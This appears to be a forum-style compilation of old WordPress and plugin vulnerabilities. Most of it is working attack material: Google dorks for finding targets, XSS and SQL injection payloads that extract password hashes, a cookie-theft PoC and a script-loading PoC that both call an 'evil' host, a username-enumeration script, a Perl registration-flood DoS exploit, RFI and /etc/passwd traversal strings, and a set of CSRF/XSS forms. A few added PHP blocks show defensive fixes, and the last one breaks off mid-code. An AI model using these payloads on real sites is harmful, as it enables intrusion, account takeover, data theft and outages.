Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Toolkit (0.2pub)
Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability
Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability

1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit
Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
WordPress <= 1.5.1.1 SQL Injection Exploit
WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionary & Bruteforce attack
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

dork:
Code:
```
"is proudly powered by WordPress" intext:"Warning: main"
inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php" ext:php
inurl:"wp-login.php" -cvs
```

Full path disclosure: WordPress < 1.5.2

Cross-site Scripting:
```
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]
```

SQL injection examples:
```
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1
```

Tables/Prefix_/Columns: wp_
Hash algorithms: md5(password)

WordPress Vulnerability Scanner
Code:
```
$ perl -x wp-scanner.pl http://testblog/wordpress/
WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)
Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS

WordPress Basic Results
wp-commentsrss2.php => Version Leak: WordPress 2.1.3
wp-links-opml.php => Version Leak: WordPress 2.1.3
wp-major-ver => Version 2.1
wp-rdf.php => Version Leak: WordPress 2.1.3
wp-rss.php => Version Leak: WordPress 2.1.3
wp-rss2.php => Version Leak: WordPress 2.1.3
wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
wp-title => Test Blog
wp-version => WordPress 2.1.3
x-Pingback => http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found
wp-plugins[0] => Akismet
```

Download: WordPress Scanner v1.3b BETA
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip
WordPress <=2.0.4 XSS simple PoC:
HTML:
```html
<html>
<head></head>
<body>
<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email" value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
```

cookie theft PoC:
HTML:
```html
<html>
<head></head>
<body>
<form method="post" action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email" value='"><script>eval(location.hash.substr(1))</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
```

unrestricted script insertion from a third-party site (we prove we can inject ANY JS):
HTML:
```html
<html>
<head></head>
<body>
<form method="post" action="http://victim/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email" value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
```
07 June 2007
Program: WordPress 2.2, possibly earlier versions
Severity: Medium
Exploit available: Yes
Description: The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database. It exists because of insufficient sanitisation of input data in the "wp.suggestCategories" method of the xmlrpc.php script. A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request. This requires that user registration is enabled on the site; the request is sent only via POST. Here is an example request:
Code:
```xml
<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>login here</value></param>
<param><value>password here</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>
```
Wordpress 2.2 Username Enumeration
Code:
```bash
#!/bin/bash
# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
  echo "need two parameters! correct syntax is:"
  echo "$0 <ip-or-hostname> <wordlist-filename>"
  exit 1
fi

for U in `cat $2`
do
  #echo $U
  if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url "http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' > /dev/null
  then
    echo "username found!: $U"   # print username found on screen
    echo $U >> $0.found          # save results to file equal to script name plus .found extension
  fi
done
```
WordPress Security Whitepaper: http://blogsecurity.net/projects/secure-wp-whitepaper.pdf
Writing Secure WordPress Plugins: http://michaeldaw.org/papers/securing_wp_plugins/
WordPress PHP_Self Cross-Site Scripting Vulnerability
Code:
```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Wordpress XSS PoC</title>
</head>
<body id="main">
<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
<p>
<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
</p>
<p>
<input type="hidden" name="action" value="update" />
<input type="hidden" name="file" value="wp-content/themes/default/index.php" />
</p>
</form>
<script type="text/javascript">
// <![CDATA[
document.forms[0].submit();
// ]]>
</script>
</body>
</html>
```

Vulnerable URI:
Code:
```
/wp-admin/plugins.php?page=akismet-key-config
```

Vulnerable POST variable:
Code:
```
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
```

by 0x000000
runPHP Plugin
```
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201'=0
```

WP < 2.3
```
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>
```

WordPress 2.0.1 Remote DoS Exploit
Code:
```perl
#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded. Only 6/10 got crashed
use Socket;

if (@ARGV < 2) { &usage; }

$rand = rand(10);
$host = $ARGV[0];
$dir  = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
    $user = "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len  = length $data;
    $foo  = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
            "Accept: */*\r\n".
            "Accept-Language: en-gb\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "Accept-Encoding: gzip, deflate\r\n".
            "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
            "Host: $host\r\n".
            "Content-Length: $len\r\n".
            "Connection: Keep-Alive\r\n".
            "Cache-Control: no-cache\r\n\r\n".
            "$data";
    my $port  = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET, "$foo", 0);
    syswrite STDOUT, "+";
}

#s33 if the server is down
print "\n\n";
system('ping $host');

sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n";
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
};
```
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Code:
```
#Author: S.W.A.T.
#cont@ct: [email protected]
--------------------------------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download    : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/[path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork: "inurl:/plugins/BackUp"
Mirror: http://www.milw0rm.com/exploits/4593
```
SQL Injection in WordPress 2.3.1
Code:
```
Author      : Beenu Arora
Mail        : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage    : http://wordpress.org/

~~~~~~~~~~~~~~~~~~ SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter      : p

POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*
```
Source: http://www.securityfocus.com/archive/1/484608
WordPress Charset SQL Injection Vulnerability

Insufficient filtering when the database uses the GBK charset leads to SQL injection. (Article describing the vulnerability on Antichat: https://forum.antichat.ru/thread62109.html)

Exploit:
```
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
```
Background: _http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html

Code:
```
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== WordPress Charset SQL Injection Vulnerability ===

Release date:     2007-12-10
Last modified:    2007-12-10
Source:           Abel Cheung
Affected version: WordPress

escape($gpc); }

Finally, escape() method belongs to wp-includes/wp-db.php:

function escape($string) {
    return addslashes( $string ); // Disable rest for now, causing problems
    ......
}

3. Proof of concept

a. After WordPress installation, modify wp-config.php to make sure it uses
   a certain character set for the database connection (Big5 can also be used):

   define('DB_CHARSET', 'GBK');

b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

4. Workaround

Note: This vulnerability only exists for database queries performed using
certain character sets. For databases created in most other character sets
no remedy is needed.

a. It is recommended to convert the WordPress database to use character sets
   not vulnerable to such SQL exploit. One such charset is UTF-8, which does
   not use backslash ('\') as part of a character and supports various
   languages.

b. Alternatively, edit the WordPress theme to remove search capability.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
```
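The advisory above pins the fault on an escape() that is just addslashes(). The following is an added example, not WordPress code, showing why a byte-oriented escape breaks under a multibyte connection charset such as GBK and what a maintainer would put in its place: a driver-side escape with the charset set through mysqli_set_charset(), and, preferably, a prepared statement. The mysqli host, credentials and database name are placeholders; the byte string and the query are constructed for the demonstration.

```php
<?php
// Added example; not WordPress code. Contrasts the addslashes() escape from
// wp-db.php with charset-aware alternatives. Connection details are
// placeholders; the input bytes are constructed from the advisory's %b3%27.

mysqli_report(MYSQLI_REPORT_OFF);   // keep connect failures as return values, not exceptions

// The vulnerable pattern: a byte-oriented escape that knows nothing about
// the connection charset.
function escape_with_addslashes(string $s): string {
    return addslashes($s);
}

// Replacement 1: let the client library escape, after telling it the charset
// with mysqli_set_charset(). A plain "SET NAMES gbk" query changes only the
// server side; the library would then still escape byte by byte.
function escape_with_driver(mysqli $db, string $s): string {
    return mysqli_real_escape_string($db, $s);
}

// Replacement 2 (preferred): a prepared statement carries the value out of
// band, so its bytes are never parsed as SQL whatever the charset is.
function search_titles(mysqli $db, string $term): array {
    $stmt = $db->prepare(
        "SELECT ID, post_title FROM wp_posts WHERE post_status = 'publish' AND post_title LIKE ?"
    );
    if ($stmt === false) {
        return [];
    }
    $like = '%' . $term . '%';
    $stmt->bind_param('s', $like);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // needs mysqlnd
    $stmt->close();
    return $rows;
}

// The advisory's input: a GBK lead byte (0xB3) followed by a single quote.
$input = "\xB3'";

// addslashes() produces the bytes B3 5C 27. Read as GBK, B3 5C is one
// character, so the 27 that follows is an unescaped quote that ends the
// string literal; that is the whole exploit.
printf("addslashes: %s\n", bin2hex(escape_with_addslashes($input)));

// With a live connection the driver-side escape can be compared directly:
// once the client library knows the charset is GBK it escapes the lone
// lead byte as well, so no B3 5C pair is ever formed.
$db = mysqli_connect('db.example.invalid', 'user', 'password', 'wordpress');
if ($db instanceof mysqli) {
    mysqli_set_charset($db, 'gbk');
    printf("driver escape: %s\n", bin2hex(escape_with_driver($db, $input)));
    print_r(search_titles($db, $input));
    mysqli_close($db);
} else {
    echo "no database available; skipped the driver-side comparison\n";
}
```

The first printf runs offline and shows the B3 5C 27 sequence the advisory relies on; the connection branch needs a MySQL instance reachable under the placeholder credentials. The workaround in the advisory (switch the database to UTF-8) removes the trigger, but a charset-aware escape or a bound parameter removes the bug regardless of charset.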
Wordpress 2.3.1 - Broken Access Control is_admin()

Obtaining admin privileges, bypassing the password. How to use: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63

Code:
```
By Michael Brooks
Vulnerability:    Broken Access Control
Homepage:         http://wordpress.org/download
Software:         Wordpress
Version affected: 2.3.1 (Latest at the time of writing)

The impact of the flaw is that an attacker can read posts while they are
still drafts. This is an ability that only the administrator should have.
Imagine a stranger being able to read the news before it is published. Or
perhaps a spam-blog harvesting posts before they are published.

This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI']
global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many
xss flaws. Although an attacker shouldn't be able to control all $_SERVER
variables, none of them should be trusted.

exploit:
http://localhost/wordpress/'wp-admin/

This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to
contain the value:
http://localhost/wordpress/'wp-admin/

Vulnerable function: line 34, in ./wp-includes/query.php.

function is_admin () {
    global $wp_query;
    return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}

The same flaw is duplicated again on line 645 of the same file.

This url:
http://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true.

This flaw works regardless of register_globals or magic_quotes_gpc. The
attack fails when search engine friendly urls are turned on in wordpress,
however this option is turned off by default. Turning search engine
friendly urls on is a workaround until a patch is created.
```
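The root cause above is a substring test on a client-supplied string. As an added example, not WordPress's own fix, the block below puts the quoted check beside one that decides from the filesystem path of the script the web server actually executed, which the client cannot spell. The mini-install it builds in the temp directory and the request URI it feeds in are constructed.

```php
<?php
// Added example; not WordPress code. Contrasts the URI-substring check from
// wp-includes/query.php with a decision based on the executing script's
// resolved path. The temp-dir layout and URIs below are constructed.

// The page's vulnerable form: a substring test on client-supplied data.
function is_admin_by_uri(string $request_uri): bool {
    return stripos($request_uri, 'wp-admin/') !== false;
}

// Hardened form: decide from $_SERVER['SCRIPT_FILENAME'], which the web server
// derives from its own document-root mapping, and compare resolved paths so
// that '..' segments or symlinks cannot fake a location. Fails closed.
function is_admin_by_script(string $script_filename, string $abspath): bool {
    $script = realpath($script_filename);
    $admin  = realpath(rtrim($abspath, '/\\') . DIRECTORY_SEPARATOR . 'wp-admin');
    if ($script === false || $admin === false) {
        return false;
    }
    return strpos($script, $admin . DIRECTORY_SEPARATOR) === 0;
}

// Constructed mini-install: a front-end index.php and an admin index.php,
// mirroring where the real files live.
function build_fixture(): string {
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp-isadmin-' . bin2hex(random_bytes(4));
    mkdir($base . '/wp-admin', 0700, true);
    file_put_contents($base . '/index.php', "<?php // front end\n");
    file_put_contents($base . '/wp-admin/index.php', "<?php // admin\n");
    return $base;
}

$base = build_fixture();

// The page's URI contains the substring, yet the request is served by the
// front-end script: the URI check and the path check disagree.
$attack_uri = "/wordpress/'wp-admin/";
printf("uri check on %s: %s\n", $attack_uri,
       is_admin_by_uri($attack_uri) ? 'admin' : 'not admin');
printf("path check, front-end script: %s\n",
       is_admin_by_script($base . '/index.php', $base) ? 'admin' : 'not admin');
printf("path check, admin script: %s\n",
       is_admin_by_script($base . '/wp-admin/index.php', $base) ? 'admin' : 'not admin');
```

The other common shape of this fix is a constant that only the admin bootstrap defines and that is_admin() then reads; both approaches share the property that matters, namely that the answer comes from something the server chose, not from the request line.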
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Code:
```
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip

Vuln Code :
In Line 5,6,7,8 :
$path  = $_GET['path'];
$size  = $_GET['size'];
$base  = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";

In Line 22 :
readfile($cache);

POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]
```
XSS in WP-ContactForm <= 2.0.7

For attacking admin only (at options page):

1
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
```

2
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
```

3
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
```

4
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
```

=====

For attacking every user of the site (at contact page):

5
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
```
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</body>
</html>
```

======

For attacking every user of the site at contact page (and admin at options page):

6
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
```

7
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
```

======

For attacking every user of the site (at contact page):

8
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
```
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="[email protected]" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
```

9
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
```
HTML:
```html
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
```
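Every PoC on this page that posts a form from another origin (the wp-register.php ones, the theme-editor one, and the nine WP-ContactForm ones above) exercises the same two gaps: option values are echoed back into an attribute or a textarea without encoding, and the options page accepts a POST that carries nothing tying it to the logged-in session. The block below is an added example, not the plugin's code, of a settings handler that closes both. The option names are the ones from the PoCs; the session array and the two posted payloads are constructed.

```php
<?php
// Added example; not WP-ContactForm code. Shows contextual output encoding
// and a session-bound anti-CSRF token for an options form. Option names are
// taken from the PoCs above; $session and the POST arrays are constructed.

// Contextual encoding. ENT_QUOTES converts both ' and " so a stored value
// cannot leave value='...' or value="..."; the same call turns a literal
// "</textarea>" into text inside a <textarea>.
function esc(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Anti-CSRF token bound to the session. Another origin cannot read it, so a
// form auto-submitted from elsewhere arrives without it and is refused
// before anything is written.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_valid(array $session, $submitted): bool {
    return isset($session['csrf']) && is_string($submitted)
        && hash_equals($session['csrf'], $submitted);
}

const OPTION_KEYS = ['wpcf_email', 'wpcf_subject', 'wpcf_question',
                     'wpcf_answer', 'wpcf_success_msg', 'wpcf_error_msg'];

// Handles the options POST: check the token first, then copy only known keys.
function handle_options_post(array $post, array &$session, array &$opts): string {
    if (!csrf_valid($session, $post['_wpcf_token'] ?? null)) {
        return 'rejected: missing or invalid anti-CSRF token';
    }
    foreach (OPTION_KEYS as $k) {
        if (isset($post[$k]) && is_string($post[$k])) {
            $opts[$k] = $post[$k];
        }
    }
    return 'saved';
}

// Renders the form with every stored value encoded for its context.
function render_options_form(array $opts, array &$session): string {
    $h  = '<form method="post">' . "\n";
    $h .= '<input type="hidden" name="_wpcf_token" value="' . esc(csrf_token($session)) . '" />' . "\n";
    foreach (['wpcf_email', 'wpcf_subject', 'wpcf_question', 'wpcf_answer'] as $k) {
        $h .= '<input type="text" name="' . $k . "\" value='" . esc($opts[$k] ?? '') . "' />\n";
    }
    foreach (['wpcf_success_msg', 'wpcf_error_msg'] as $k) {
        $h .= '<textarea name="' . $k . '">' . esc($opts[$k] ?? '') . "</textarea>\n";
    }
    return $h . "</form>\n";
}

$session = [];
$opts    = [];

// Constructed forged request modelled on PoC 1: no token, so it is refused.
$forged = ['stage' => 'process',
           'wpcf_email' => '"><script>alert(document.cookie)</script>'];
echo handle_options_post($forged, $session, $opts), "\n";

// Constructed legitimate request carrying the token: PoC 6's payload is
// stored verbatim, and the rendered form shows it encoded and inert.
$legit = ['_wpcf_token'      => csrf_token($session),
          'wpcf_success_msg' => '</textarea><script>alert(document.cookie)</script>'];
echo handle_options_post($legit, $session, $opts), "\n";
echo render_options_form($opts, $session);
```

The order matters: the token check runs before any option is touched, so a forged request leaves the stored values unchanged, and the encoding is applied at output time rather than on input, so the same stored string is safe in both the attribute and the textarea context.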
Directory traversal vulnerabilities in WP 2.0.11 (Windows only)
PHP:
```php
function validate_file(..)
    if (false !== strpos($file, './'))
```
Code:
Proof of concept:
```
http://site/wp-admin/index.php?page=\..\..\.htaccess
```
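The PictPress item and the validate_file() item are the same defect seen twice: a user-supplied path fragment is joined onto a base directory and then handed to a file function, with either no check (resize.php) or a check that looks for one separator only (the './' test, which the backslash form above walks past). The block below is an added example, not PictPress or WordPress code, of a resolver that serves both cases: it rejects NUL bytes, allow-lists the size parameter, refuses a ".." segment on either separator, and then lets realpath() have the final say by requiring the resolved file to sit under the cache root. The cache tree it builds in the temp directory and the inputs it tests are constructed.

```php
<?php
// Added example; not PictPress or WordPress code. Safe replacement for the
// "$base/cache/$size/$path" + readfile() pattern, also covering the
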